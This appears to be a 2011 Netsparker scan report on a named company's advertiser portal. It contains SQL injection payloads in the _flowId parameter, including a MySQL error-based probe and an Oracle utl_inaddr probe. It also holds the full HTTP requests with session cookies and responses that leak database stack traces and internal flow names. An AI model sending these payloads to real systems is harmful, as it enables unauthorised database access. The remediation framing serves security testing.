Netsparker, Web Application Security Scanner

XSS, Cross Site Scripting, CWE-79, CAPEC-86, JAvascript Injection, www.supermedia.com

Netsparker - Scan Report Summary
TARGET URL
 http://www.supermedia.com/spportal/spportalFl...
SCAN DATE
 3/19/2011 6:57:06 AM
REPORT DATE
 3/19/2011 7:03:13 AM
SCAN DURATION
 00:04:32

Total Requests

Average Speed

req/sec.
18
identified
6
confirmed
7
critical
0
informational

GHDB, DORK Tests

GHDB, DORK Tests
PROFILE
 Previous Settings
ENABLED ENGINES
 Static Tests, Find Backup Files, Blind Command Injection, Blind SQL Injection, Boolean SQL Injection, Command Injection, HTTP Header Injection, Local File Inclusion, Open Redirection, Remote Code Evaluation, Remote File Inclusion, SQL Injection, Cross-site Scripting
Authentication
Scheduled

VULNERABILITIES

Vulnerabilities
Netsparker - Web Application Security Scanner
CRITICAL
39 %
IMPORTANT
28 %
MEDIUM
6 %
LOW
28 %
[High Possibility] SQL Injection

[High Possibility] SQL Injection

7 TOTAL
CRITICAL
SQL Injection occurs when data input for example by a user is interpreted as a SQL command rather than normal data by the backend database. This is an extremely common vulnerability and its successful exploitation can have critical implications. Even though Netsparker believes that there is a SQL Injection in here it could not confirm it. There can be numerous reasons for Netsparker not being able to confirm this. We strongly recommend investigating the issue manually to ensure that it is an SQL Injection and that it needs to be addressed. You can also consider sending the details of this issue to us, in order that we can address this issue for the next time and give you a more precise result.

Impact

Depending on the backend database, database connection settings and the operating system, an attacker can mount one or more of the following type of attacks successfully:
  • Reading, Updating and Deleting arbitrary data from the database
  • Executing commands on the underlying operating system
  • Reading, Updating and Deleting arbitrary tables from the database

Actions to Take

  1. See the remedy for solution.
  2. If you are not using a database access layer (DAL) within the architecture consider its benefits and implement if appropriate. As a minimum the use of s DAL will help centralize the issue and its resolution. You can also use an ORM (object relational mapping). Most ORM systems use parameterized queries and this can solve many if not all SQL Injection based problems.
  3. Locate all of the dynamically generated SQL queries and convert them to parameterised queries. (If you decide to use a DAL/ORM, change all legacy code to use these new libraries)
  4. Monitor and review weblogs and application logs in order to uncover active or previous exploitation attempts.

Remedy

A very robust method for mitigating the threat of SQL Injection based vulnerabilities is to use parameterized queries (prepared statements). Almost all modern languages provide built in libraries for this. Wherever possible do not create dynamic SQL queries or SQL queries with string concatenation.

Required Skills for Successful Exploitation

There are numerous freely available tools to test for SQL Injection vulnerabilities. This is a complex area with many dependencies, however it should be noted that the numerous resources available in this area have raised both attacker awareness of the issues and their ability to discover and leverage them. SQL Injection is one of the most common web application vulnerabilities.

External References

Remedy References

- /spportal/spportalFlow.do

/spportal/spportalFlow.do

https://www.supermedia.com/spportal/spportalFlow.do?_flowId=(select+1+and+row(1%2c1)%3e(select+count..

Parameters

Parameter Type Value
_flowId GET (select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))

Request

GET /spportal/spportalFlow.do?_flowId=(select+1+and+row(1%2c1)%3e(select+count(*)%2cconcat(CONCAT(CHAR(95)%2CCHAR(33)%2CCHAR(64)%2CCHAR(52)%2CCHAR(100)%2CCHAR(105)%2CCHAR(108)%2CCHAR(101)%2CCHAR(109)%2CCHAR(109)%2CCHAR(97))%2c0x3a%2cfloor(rand()*2))x+from+(select+1+union+select+2)a+group+by+x+limit+1)) HTTP/1.1
Referer: https://www.supermedia.com/spportal/forgotPwd.do
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.supermedia.com
Cookie: JSESSIONID=E1AC2AA3159FB94ADA25D554A846EBD5.app6-a1; NSC_xxx-tvqfsnfejb-dpn=ffffffff9482139f45525d5f4f58455e445a4a423660; trafficSource=default; CstrStatus=U
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Server: Unspecified
Date: Sat, 19 Mar 2011 11:58:52 GMT
Pragma: No-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache,no-store
Content-Type: text/html;charset=UTF-8
Content-Language: en
Connection: close
Content-Encoding:
Content-Length: 6626






<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="en-US">
<head>

<!-- UI framework designed and implemented by Advertiser Portal UI Team -->

<title>SuperPages - Error</title>



















<link rel="stylesheet" type="text/css" href="style/global.css" >
<link rel="stylesheet" type="text/css" href="style/form.css" >
<!--[if IE]>
<link rel="stylesheet" type="text/css" href="style/iehack.css" >
<![endif]-->
<script src="js/jquery/jquery.js" type="text/javascript"></script>
<script type="text/javascript" language="JavaScript" src="js/header.js"></script>
<script type="text/javascript" language="JavaScript" src="js/cookies.js"></script>
<script type="text/javascript" language="JavaScript" src="js/popupBlockerDetection.js"></script>
<script type="text/javascript" src="js/jquery/blockui.js"></script>





<META http-equiv=Content-Type content="text/html; charset=utf-8">
</head>
<body onload="" onunload="" onbeforeunload="">
<!-- specify omniture report suite for analytics -->
<!-- SiteCatalyst code version: H.1. Copyright 1997-2005 Omniture, Inc.More info available at http://www.omniture.com --><script type="text/javascript" language="javascript"> // use the appropriate account based on the server var s_account="Superpagesadvert";</script>
<!-- output omniture header -->
<!-- SiteCatalyst code version: H.14. Copyright 1997-2007 Omniture, Inc. More info available at http://www.omniture.com --><script type="text/javascript" language="JavaScript" src="/spportal/js/s_code.js"></script><script type="text/javascript" language="JavaScript"><!--/* You may give each page an identifying name, server, and channel onthe next lines. */s.channel="";s.pagetype="";s.server="";s.referrer="";s.pageName="";s.prop1="Processing Error Title";s.prop2="";s.prop3="";s.prop4="";s.prop5="";s.prop6="General Exception";s.prop7="Exception thrown executing [AnnotatedAction@3ccdf84f targetAction = com.idearc.ssa.web.spring.LoginActAction@e0d3cc7, attributes = map['method' -> 'setupForm']] in state 'enterCriteria' of flow 'loginact-flow' -- action execution attributes were 'map['method' -> 'setupForm']'; nested exception is org.springframework.jdbc.UncategorizedSQLException: SqlMapClient operation; uncategorized SQLException for SQL []; SQL state [99999]; error code [28232]; --- The error occurred in ibatis/maps/GenericServices.xml. --- The error occurred while applying a parameter map. --- Check the GenericServices.getDecryptValue-InlineParameterMap. --- Check the statement (query failed). --- Cause: java.sql.SQLException: ORA-28232: invalid input length for obfuscation toolkitORA-06512: at "SYS.DBMS_OBFUSCATION_TOOLKIT_FFI", line 40ORA-06512: at "SYS.DBMS_OBFUSCATION_TOOLKIT", line 138ORA-06512: at "PSMGR.DECRYPT_FUNCTION", line 8; nested exception is com.ibatis.common.jdbc.exception.NestedSQLException: --- The error occurred in ibatis/maps/GenericServices.xml. --- The error occurred while applying a parameter map. --- Check the GenericServices.getDecryptValue-InlineParameterMap. --- Check the statement (query failed). --- Cause: java.sql.SQLException: ORA-28232: invalid input length for obfuscation toolkitORA-06512: at "SYS.DBMS_OBFUSCATION_TOOLKIT_FFI", line 40ORA-06512: at "SYS.DBMS_OBFUSCATION_TOOLKIT", line 138ORA-06512: at "PSMGR.DECRYPT_FUNCTION", line 8";s.prop8="";s.prop9="";s.prop10="E1AC2AA3159FB94ADA25D554A846EBD5.app6-a1";s.prop11="";s.prop12="";s.prop13="";s.prop14="";s.prop15="";s.prop16="";s.prop17="";s.prop18="";s.prop19="";s.prop20="";s.prop21="";s.prop22="";s.prop23="";s.prop24="";s.prop25="";s.prop26="";s.prop27="";s.prop28="";s.prop29="";s.prop30="";/* Conversion Variables */s.zip="";s.purchaseID="";s.state="";s.events="";s.campaign="";s.products="";s.eVar1="";s.eVar2="";s.eVar3="";s.eVar4="";s.eVar5="";s.eVar6="";s.eVar7="";s.eVar8="";s.eVar9="";s.eVar10="";s.eVar11="";s.eVar12="";s.eVar13="";s.eVar14="";s.eVar15="";s.eVar16="";s.eVar17="";s.eVar18="";s.eVar19="";s.eVar20="";s.eVar21="";s.eVar22="";s.eVar23="";s.eVar24="";s.eVar25="";s.eVar26="";s.eVar27="";s.eVar28="";s.eVar29="";s.eVar30="";--></script>
<!-- Test & Target tracking - added 10/01 -->
<script type="text/javascript" src="js/mbox.js"></script>
<div >





























<!-- Header Start -->






















<!-- Javascript to capture buttons from the landing pages in omniture -->
<script language="javascript" type="text/JavaScript">

</script>
<!-- End of 'capture' omniture code -->
<!-- Code to find isSecurePage Start -->


<!-- Code to find isSecurePage End -->
<!-- Atlas Code Start -->


<script language="javascript" type="text/JavaScript">document.write('<s'+'cript language="JavaScript" src="https://view.atdmt.com/jaction/00asup_RetargetingSecure_1"></s'+'cript>')</script><noscript><iframe src="https://view.atdmt.com/iaction/00asup_RetargetingSecure_1" width="1" height="1" frameborder="0" scrolling="No" marginheight="0" marginwidth="0" ></iframe></noscript>



<!-- Atlas Code End -->



<div id="header">
<div id="top">





<a href="https://www.supermedia.com" title="SuperMedia"><img alt="SuperMedia" src="https://www.supermedia.com/spportal/img-spportal/supermedia/banners/supermedia-logo.gif" width="173" height="55" border="0" class="title"/></a>



<div id="utility_nav">


<ul id="utility_nav-list">
<li><a href="https://www.supermedia.com/business-listings" title="Add/Edit A Free Listing">Add/Edit A Free Listing</a></li>
<li><a href="https://www.supermedia.com/about-us" title="About">About</a></li>
<li><a href="https://www.supermedia.com/help" class="utility" title="Support">Support</a></li>
<li>
<a href="https://www.supermedia.com/signin" title="Account Sign In"><b> Sign In</b></a>

</li>
</ul>


</div>



<div id="contactSalesDiv">
<!-- If not signed in show sales team info -->
<span id="customer-service-number">Order by phone&nbsp;(866) 311-4186</span>


</div>

<div id="globalnav">
<ul id="globalnav-list">



<li><a id="home" href="https://www.supermedia.com" title="Home">Home</a></li>
<li><a id="online-advertising" href="https://www.supermedia.com/online-advertising" title="Online Advertising">Online Advertising </a></li>
<li><a id="print-advertising" href="https://www.supermedia.com/print-advertising" title="Yellow Pages">Yellow Pages</a></li>
<li><a id="direct-mail" href="https://www.supermedia.com/direct-mail" title="Direct Mail">Direct Mail</a></li>
<li><a id="web-site" href="https://www.supermedia.com/web-sites" title="Web Sites">Web Sites</a></li>
<li><a id="packaged-solutions" href="https://www.supermedia.com/packaged-solutions" title="Packaged Solutions">Packaged Solutions</a></li>



</ul>
</div>
</div>
</div>






















<!-- Roll-over navigation menus -->


<!-- Header End -->





</div>
<div id="content-shadow" >
<div id="content" >

<!-- Setting the omniture page name --><script type="text/javascript" language="javascript"> s.pageName="Processing Error Title";</script>
<div id="bodyfooterwrap">
<h4>
An Error has occurred in this application. Please try back at a later time.
</h4>
No such flow definition with id &#039;(select 1 and row(1,1)&gt;(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))&#039; found; the flows available are: array&lt;String&gt;[&#039;accountAdmin-flow&#039;, &#039;accountreg-flow&#039;, &#039;businessprofile-flow&#039;, &#039;client-consolidation-flow&#039;, &#039;contactus-flow&#039;, &#039;coupon-flow&#039;, &#039;forgotpassword-edit-flow&#039;, &#039;funding-flow&#039;, &#039;lead-maintain-flow&#039;, &#039;listingOrderSummary-flow&#039;, &#039;login-flow&#039;, &#039;loginact-flow&#039;, &#039;maintaincreditcard-flow&#039;, &#039;microsite-flow&#039;, &#039;myaccount-contactinfo-edit-flow&#039;, &#039;myaccount-domains-flow&#039;, &#039;myaccount-email-edit-flow&#039;, &#039;myaccount-emails-flow&#039;, &#039;myaccount-flow&#039;, &#039;myaccount-password-edit-flow&#039;, &#039;myaccount-websites-flow&#039;, &#039;onlinecc-flow&#039;, &#039;ordersummary-flow&#039;, &#039;paypercall-flow&#039;, &#039;pfc-businessprofile-flow&#039;, &#039;pfc-flow&#039;, &#039;pfp-adDesign-flow&#039;, &#039;pfp-categories-flow&#039;, &#039;pfp-elp-flow&#039;, &#039;pfp-geo-flow&#039;, &#039;pfp-keywords-flow&#039;, &#039;photos-flow&#039;, &#039;ppc-advsearch-flow&#039;, &#039;ppc-bidding-flow&#039;, &#039;ppc-create-flow&#039;, &#039;ppc-fullservice-flow&#039;, &#039;ppc-maintain-flow&#039;, &#039;repmanagement-flow&#039;, &#039;reviews-flow&#039;, &#039;sclicks-maintain-flow&#039;, &#039;sharethewealth-flow&#039;, &#039;temporary-password-flow&#039;, &#039;webhosting-addons-flow&#039;, &#039;webhosting-design-flow&#039;, &#039;webhosting-domainnames-flow&#039;, &#039;webhosting-email-products-flow&#039;, &#039;webhosting-websites-flow&#039;]
</div>

</div>
</div>
<div >























<!-- Footer Start -->

<!-- DROP DOWN START -->
<div id="dropDownShadow" ></div>
<div id="dropDownHolder" class="dropDownNavHolder">
</div>
<div class="nodisplay">
<div class="dropdown-content" id="online-advertising-dropdown-content">
<ul>
<li><a href="https://www.supermedia.com/business-listings/listing-enhancements-packages">Click packages</a></li>
<li><a href="https://www.supermedia.com/local-search-marketing/do-it-yourself">Do-it-yourself search marketing</a></li>
<li><a href="https://www.supermedia.com/local-search-marketing/services">Search marketing services</a></li>
<li><a href="https://www.supermedia.com/video-ads">Video ads</a></li>
<li><a href="https://www.supermedia.com/business-listings">Business listings</a></li>
<li><a href="https://www.supermedia.com/reputation-monitoring">Reputation monitoring</a></li>
<li><a href="https://www.supermedia.com/business-listings/coupons">Coupons</a></li>
</ul>
</div>

<div class="dropdown-content" id="print-advertising-dropdown-content">
<ul>
<li><a href="https://www.supermedia.com/print-advertising/yellow-pages">Yellow pages</a></li>
<li><a href="https://www.supermedia.com/print-advertising/white-pages">White pages</a></li>
<li><a href="https://www.supermedia.com/directory-options">Directory options</a></li>
</ul>
</div>

<div class="dropdown-content" id="direct-mail-dropdown-content">
<ul>
<li><a href="https://www.supermedia.com/direct-mail/postcards">Postcards</a></li>
<li><a href="https://www.supermedia.com/direct-mail/shared-card-packs">Shared card packs</a></li>
<li><a href="https://www.supermedia.com/direct-mail/call-tracking">Call tracking</a></li>
<li><a href="https://www.supermedia.com/direct-mail/compare-direct-mail-options">Compare options</a></li>
</ul>
</div>

<div class="dropdown-content" id="web-site-dropdown-content">
<ul>
<li><a href="https://www.supermedia.com/web-design">Web site design</a></li>
<li><a href="https://www.supermedia.com/web-hosting">Web site hosting</a></li>
<li><a href="https://www.supermedia.com/domain-names">Domain names</a></li>
<li><a href="https://www.supermedia.com/business-email">Business email</a></li>
</ul>
</div>

<div class="dropdown-content" id="packaged-solutions-dropdown-content">
<ul>
<li><a href="https://www.supermedia.com/packaged-solutions/multi-product-packages">Multi-product packages</a></li>
<li><a href="https://www.supermedia.com/packaged-solutions/business-profile-packages">Business profile packages</a></li>
<li><a href="https://www.supermedia.com/packaged-solutions/auto-dealer-packages">Auto dealer packages</a></li>
</ul>
</div>
</div>
<script type="text/javascript">
function addDropDownShadow(){
var IMAGEWIDTH=220,IMAGEHEIGHT=260,SHADOWSIZE=10;
var contentWidth = $("#dropDownHolder").width();
var contentHeight= $("#dropDownHolder").height();
var contentPos= $("#dropDownHolder").offset();

//set shadow position
$("#dropDownShadow").css("top",contentPos.top);
$("#dropDownShadow").css("left",contentPos.left-SHADOWSIZE);

//now add image aligned at bottom
var imgStyle=' style="position:relative;left:0px;top:'+(contentHeight+SHADOWSIZE-IMAGEHEIGHT)+'" ';
var imgHTML= '<img src="https://www.supermedia.com/img/img-spportal/supermedia/backgrounds/dropdown-shadow-fixed-width.png" '+imgStyle+' />';
//alert(imgHTML);
$("#dropDownShadow").css("height",contentHeight+SHADOWSIZE);
$("#dropDownShadow").html(imgHTML);
$("#dropDownShadow").show();
}
var dropDownTimerHandle;
function clearDropDownTimer(){
if(dropDownTimerHandle!=0){
clearTimeout(dropDownTimerHandle);
}
dropDownTimerHandle= 0;
}
function setDropDownTimer(){
dropDownTimerHandle= setTimeout(function(){
$("#dropDownHolder").hide();
$("#dropDownShadow").hide();
},1000);
}
$(document).ready(function(){
$("#globalnav-list li a").each(function(){
if(document.getElementById($(this).attr("id")+'-dropdown-content')){
$(this).mouseover(function(){
clearDropDownTimer();
var pos= $(this).offset();
$("#dropDownHolder").css("left",pos.left+1);
$("#dropDownHolder").css("top",pos.top+35);
var dropDownSel= '#'+$(this).attr("id")+'-dropdown-content';
$("#dropDownHolder").html($(dropDownSel).html());
$("#dropDownHol..
- /spportal/spportalFlow.do

/spportal/spportalFlow.do

https://www.supermedia.com/spportal/spportalFlow.do?_flowExecutionKey=_cC9929562-1A32-5057-A587-11DC..

Parameters

Parameter Type Value
_flowExecutionKey GET _cC9929562-1A32-5057-A587-11DC0A31EA74_kE80D149C-BEB5-3948-9F78-6F4585753F09

Request

GET /spportal/spportalFlow.do?_flowExecutionKey=_cC9929562-1A32-5057-A587-11DC0A31EA74_kE80D149C-BEB5-3948-9F78-6F4585753F09 HTTP/1.1
Referer: https://www.supermedia.com/spportal/spportalFlow.do?fromPage=index&username=&password=&&_flowId=loginact-flow
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.supermedia.com
Cookie: JSESSIONID=2FF790FDB315C80023FC621E3266E6C1.app7-a1; NSC_xxx-tvqfsnfejb-dpn=ffffffff9482139c45525d5f4f58455e445a4a42378b; trafficSource=default; CstrStatus=RVU
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Server: Unspecified
Date: Sat, 19 Mar 2011 11:58:59 GMT
Pragma: No-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache,no-store
Content-Type: text/html;charset=UTF-8
Content-Language: en
Connection: close
Content-Encoding:
Content-Length: 12286






<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="en-US">
<head>

<title>Online Advertising : Superpages Small Business Online Advertising</title>



















<link type="text/css" rel="stylesheet" href="http://www.superpages.com/inc/social/soc.css" >
<link rel="stylesheet" type="text/css" href="https://www.supermedia.com/spportal/style/cobrand.css" >
<link rel="stylesheet" type="text/css" href="https://www.supermedia.com/spportal/style/supermedia/supermedia.css">
<script type="text/javascript" src="https://www.supermedia.com/spportal/js/jquery/jquery-1.3.2.min.js"></script>
<script type="text/javascript" src="https://www.supermedia.com/spportal/js/jquery/blockui.js"></script>
<script type="text/javascript" language="JavaScript" src="https://www.supermedia.com/spportal/js/cookies.js"></script>
<script type="text/javascript" language="JavaScript" src="https://www.supermedia.com/spportal/js/header.js"></script>

<meta name="decorator" content="supermedia">
<link rel="stylesheet" type="text/css" href="https://www.supermedia.com/spportal/style/supermedia/form-page.css">
<!--[if IE]>
<link rel="stylesheet" type="text/css" href="/spportal/style/ieonly.css" />
<![endif]-->
<script type="text/javascript" src="js/seo.js"></script>
<script language="javascript" src="js/validate.js" type="text/javascript"></script>
<script type="text/javascript" src="js/websites.js"></script>
<script type="text/javascript" src="js/remember.js"></script>
<script language="JavaScript">

var needToConfirm = true;

function confirmExit() {
if(needToConfirm){
return "You haven't finished the set up process, so your changes will not be saved.";
}
}

//submit the form manually to sign in from header
function signinForm(x)
{
if(x=="signin")
document.forms["siginform"]["_eventId_findMore"].name="_eventId_signin";
else
document.forms["siginform"]["_eventId_findMore"].name="_eventId_continue";
document.forms["siginform"].submit();
}
function disblepwd(){
document.siginform.userType[1].checked=true;
}
function checkusername(username){
if(username!=null && inSignInPwd==null){
// alert(username);
document.getElementById("uname").value = "";
}
}
</script>
<style>
span.texttip {
color:#999999;
font-family:Arial,Helvetica,sans-serif;
font-size:11px;
margin-top:10px;
}
</style>


<META http-equiv=Content-Type content="text/html; charset=utf-8">
</head>
<body onload="getCookie();" onunload="">
<!-- specify omniture report suite for analytics -->
<!-- SiteCatalyst code version: H.1. Copyright 1997-2005 Omniture, Inc.More info available at http://www.omniture.com --><script type="text/javascript" language="javascript"> // use the appropriate account based on the server var s_account="Superpagesadvert";</script>
<!-- output omniture header -->
<!-- SiteCatalyst code version: H.14. Copyright 1997-2007 Omniture, Inc. More info available at http://www.omniture.com --><script type="text/javascript" language="JavaScript" src="/spportal/js/s_code.js"></script><script type="text/javascript" language="JavaScript"><!--/* You may give each page an identifying name, server, and channel onthe next lines. */s.channel="";s.pagetype="";s.server="";s.referrer="http://www.supermedia.com/spportal/js/%22javascript:closeTooltipWindow()/";s.pageName="";s.prop1="Account Setup Title";s.prop2="";s.prop3="Not Logged in";s.prop4="";s.prop5="";s.prop6="General Exception";s.prop7="Exception thrown executing [AnnotatedAction@41890a55 targetAction = com.idearc.ssa.web.spring.LoginActAction@4a943bb9, attributes = map['method' -> 'setupForm']] in state 'enterCriteria' of flow 'loginact-flow' -- action execution attributes were 'map['method' -> 'setupForm']'; nested exception is org.springframework.jdbc.UncategorizedSQLException: SqlMapClient operation; uncategorized SQLException for SQL []; SQL state [99999]; error code [28232]; --- The error occurred in ibatis/maps/GenericServices.xml. --- The error occurred while applying a parameter map. --- Check the GenericServices.getDecryptValue-InlineParameterMap. --- Check the statement (query failed). --- Cause: java.sql.SQLException: ORA-28232: invalid input length for obfuscation toolkitORA-06512: at "SYS.DBMS_OBFUSCATION_TOOLKIT_FFI", line 40ORA-06512: at "SYS.DBMS_OBFUSCATION_TOOLKIT", line 138ORA-06512: at "PSMGR.DECRYPT_FUNCTION", line 8; nested exception is com.ibatis.common.jdbc.exception.NestedSQLException: --- The error occurred in ibatis/maps/GenericServices.xml. --- The error occurred while applying a parameter map. --- Check the GenericServices.getDecryptValue-InlineParameterMap. --- Check the statement (query failed). --- Cause: java.sql.SQLException: ORA-28232: invalid input length for obfuscation toolkitORA-06512: at "SYS.DBMS_OBFUSCATION_TOOLKIT_FFI", line 40ORA-06512: at "SYS.DBMS_OBFUSCATION_TOOLKIT", line 138ORA-06512: at "PSMGR.DECRYPT_FUNCTION", line 8";s.prop8="";s.prop9="";s.prop10="2FF790FDB315C80023FC621E3266E6C1.app7-a1";s.prop11="";s.prop12="";s.prop13="";s.prop14="";s.prop15="";s.prop16="";s.prop17="";s.prop18="";s.prop19="";s.prop20="";s.prop21="";s.prop22="";s.prop23="";s.prop24="";s.prop25="";s.prop26="";s.prop27="";s.prop28="";s.prop29="";s.prop30="";/* Conversion Variables */s.zip="";s.purchaseID="";s.state="";s.events="";s.campaign="";s.products="";s.eVar1="";s.eVar2="";s.eVar3="";s.eVar4="";s.eVar5="";s.eVar6="";s.eVar7="";s.eVar8="";s.eVar9="";s.eVar10="";s.eVar11="";s.eVar12="";s.eVar13="";s.eVar14="";s.eVar15="";s.eVar16="";s.eVar17="";s.eVar18="";s.eVar19="";s.eVar20="";s.eVar21="";s.eVar22="";s.eVar23="";s.eVar24="";s.eVar25="";s.eVar26="";s.eVar27="";s.eVar28="";s.eVar29="";s.eVar30="";--></script>
<!-- Test & Target tracking - added 10/01 -->
<script type="text/javascript" src="https://www.supermedia.com/spportal/js/mbox.js"></script>






























<!-- Header Start -->






















<!-- Javascript to capture buttons from the landing pages in omniture -->
<script language="javascript" type="text/JavaScript">

</script>
<!-- End of 'capture' omniture code -->
<!-- Code to find isSecurePage Start -->


<!-- Code to find isSecurePage End -->
<!-- Atlas Code Start -->


<script language="javascript" type="text/JavaScript">document.write('<s'+'cript language="JavaScript" src="https://view.atdmt.com/jaction/00asup_RetargetingSecure_1"></s'+'cript>')</script><noscript><iframe src="https://view.atdmt.com/iaction/00asup_RetargetingSecure_1" width="1" height="1" frameborder="0" scrolling="No" marginheight="0" marginwidth="0" ></iframe></noscript>



<!-- Atlas Code End -->



<div id="header">
<div id="top">





<a href="https://www.supermedia.com" title="SuperMedia"><img alt="SuperMedia" src="https://www.supermedia.com/spportal/img-spportal/supermedia/banners/supermedia-logo.gif" width="173" height="55" border="0" class="title"/></a>



<div id="utility_nav">


<ul id="utility_nav-list">
<li><a href="https://www.supermedia.com/business-listings" title="Add/Edit A Free Listing">Add/Edit A Free Listing</a></li>
<li><a href="https://www.supermedia.com/about-us" title="About">About</a></li>
<li><a href="https://www.supermedia.com/help" class="utility" title="Support">Support</a></li>
<li>
<a href="https://www.supermedia.com/signin" title="Account Sign In"><b> Sign In</b></a>

</li>
</ul>


</div>



<div id="contactSalesDiv">
<!-- If not signed in show sales team info -->
<span id="customer-service-number">Order by phone&nbsp;(866) 311-4186</span>


</div>

<div id="globalnav">
<ul id="globalnav-list">



<li><a id="home" href="https://www.supermedia.com" title="Home">Home</a></li>
<li><a id="online-advertising" href="https://www.supermedia.com/online-advertising" title="Online Advertising">Online Advertising </a></li>
<li><a id="print-advertising" href="https://www.supermedia.com/print-advertising" title="Yellow Pages">Yellow Pages</a></li>
<li><a id="direct-mail" href="https://www.supermedia.com/direct-mail" title="Direct Mail">Direct Mail</a></li>
<li><a id="web-site" href="https://www.supermedia.com/web-sites" title="Web Sites">Web Sites</a></li>
<li><a id="packaged-solutions" href="https://www.supermedia.com/packaged-solutions" title="Packaged Solutions">Packaged Solutions</a></li>



</ul>
</div>
</div>
</div>






















<!-- Roll-over navigation menus -->


<!-- Header End -->





<div id="content-shadow" >












<!-- Setting the omniture page name --><script type="text/javascript" language="javascript"> s.pageName="Account Setup Title";</script>


<style>
.supermedia_form INPUT{

margin-bottom:0px;
}

#howtext,#whytext
{
display:none;margin-top:10px;
}
.right_sidebar_box {background-image: url(images/bkg_rounded_edges.gif) left top no-repeat; padding-top:10px; font-size:11px; line-height:17px; margin-bottom:20px;}
.right_sidebar_box .inner {padding:0 10px 0 5px};
</style>
<div id="everything">
<div id="everything_inner"><!-- EVERYTHING_INNER BEGIN -->
<div class="supermedia_form">
<table cellspacing="0" cellpadding="10" border="0" class="main-table">
<tr>
<td width="720"><!-- LEFT COLUMN BEGIN -->
<h1>Create your online account</h1> <br>






To start using SuperMedia products and services you first need to create an online account.



<form name="accountInfoForm" action="spportalFlow.do" method="post" onsubmit="accountsetupcheckcookie();">
<table width="100%" cellspacing="0" cellpadding="5" border="0">

<tr>
<td colspan="2"><p id="global-error-message" class="inline-error-message">Please address the item(s) highlighted on this page.</p></td>
</tr>



<tr><td colspan="2"><div class="form_bottom_border">&nbsp;</div></td></tr>





<tr><td colspan="2"><h2 class="form_subtitle">Account information</h2></td></tr>
<tr><td class="supermedia_label" width="20%">First Name</td>
<td class="supermedia_input" width="80%">



<p id="customerProfile.firstname-error" class="inline-error-message">First name is a required field </p>


<input type="text" name="customerProfile.firstname" value="" maxlength="30"/>
</td></tr>



<tr><td class="supermedia_label">Last Name</td>
<td class="supermedia_input">



<p id="customerProfile.lastname-error" class="inline-error-message">Last name is a required field </p>


<input type="text" name="customerProfile.lastname" value="" maxlength="30"/>
</td></tr>



<tr>
<td class="supermedia_label">Email Address</td>
<td class="supermedia_input">




<p id="customerProfile.user.username-error" class="inline-error-message">Email Address is a required field </p>


<input class="with-desc" id="account-email" type="text" name="customerProfile.user.username" value="" maxlength="70"/><br>
<span class="texttip"> Email is used to sign in</span></td></tr>




<tr>
<td class="supermedia_label">Password</td>
<td class="supermedia_input" width="80%">





<p id="customerProfile.user.password-error" class="inline-error-message">Please supply a Password </p>


<span id="invalidPwdChar" style="margin-left:0px" class="inline-error-message" >Please enter another password without special characters. Passwords can only include letters and numbers. </span>

<input class="with-desc" type="password" id="pwd" name="customerProfile.user.password" value="" maxlength="32" AUTOCOMPLETE = "off"/><br>
<span class="texttip">Password must be six or more characters, using both letters and numbers, and is case-sensitive.</span></td></tr>





<tr>
<td class="supermedia_label">Retype Password</td>
<td class="supermedia_input" width="80%">



<p id="customerProfile.passwordConfirmation-error" class="inline-error-message">Please retype your password </p>


<input type="password" name="customerProfile.passwordConfirmation" value="" maxlength="32" AUTOCOMPLETE = "off"/></td></tr>


</table>
<table width="100%" cellspacing="0" cellpadding="5" border="0" id="companyInfo" style="padding-left:20px;">

<input type="hidden" id="hideCompanyInfo" value="hideCompanyInfo"/>
<input type="hidden" name="printAcctSubmitInfo" value=""/>

<tr>
<td colspan="2"><div class="form_bottom_border">..
- /spportal/spportalFlow.do

/spportal/spportalFlow.do

https://www.supermedia.com/spportal/spportalFlow.do?fromPage=login&_flowId=%27%7C%7C(utl_inaddr.get_..

Parameters

Parameter Type Value
fromPage GET login
_flowId GET '||(utl_inaddr.get_host_address((select chr(95)||chr(33)||chr(64)||chr(51)||chr(100)||chr(105)||chr(108)||chr(101)||chr(109)||chr(109)||chr(97) from DUAL)))||'

Request

GET /spportal/spportalFlow.do?fromPage=login&_flowId=%27%7C%7C(utl_inaddr.get_host_address((select+chr(95)%7C%7Cchr(33)%7C%7Cchr(64)%7C%7Cchr(51)%7C%7Cchr(100)%7C%7Cchr(105)%7C%7Cchr(108)%7C%7Cchr(101)%7C%7Cchr(109)%7C%7Cchr(109)%7C%7Cchr(97)+from+DUAL)))%7C%7C%27 HTTP/1.1
Referer: http://www.supermedia.com/spportal/spportalFlow.do?fromPage=login&_flowId=loginact-flow
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.supermedia.com
Cookie: JSESSIONID=2FF790FDB315C80023FC621E3266E6C1.app7-a1; NSC_xxx-tvqfsnfejb-dpn=ffffffff9482139c45525d5f4f58455e445a4a42378b; trafficSource=default; CstrStatus=RVU
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Server: Unspecified
Date: Sat, 19 Mar 2011 11:59:01 GMT
Pragma: No-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache,no-store
Content-Type: text/html;charset=UTF-8
Content-Language: en
Connection: close
Content-Encoding:
Content-Length: 6625






<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="en-US">
<head>

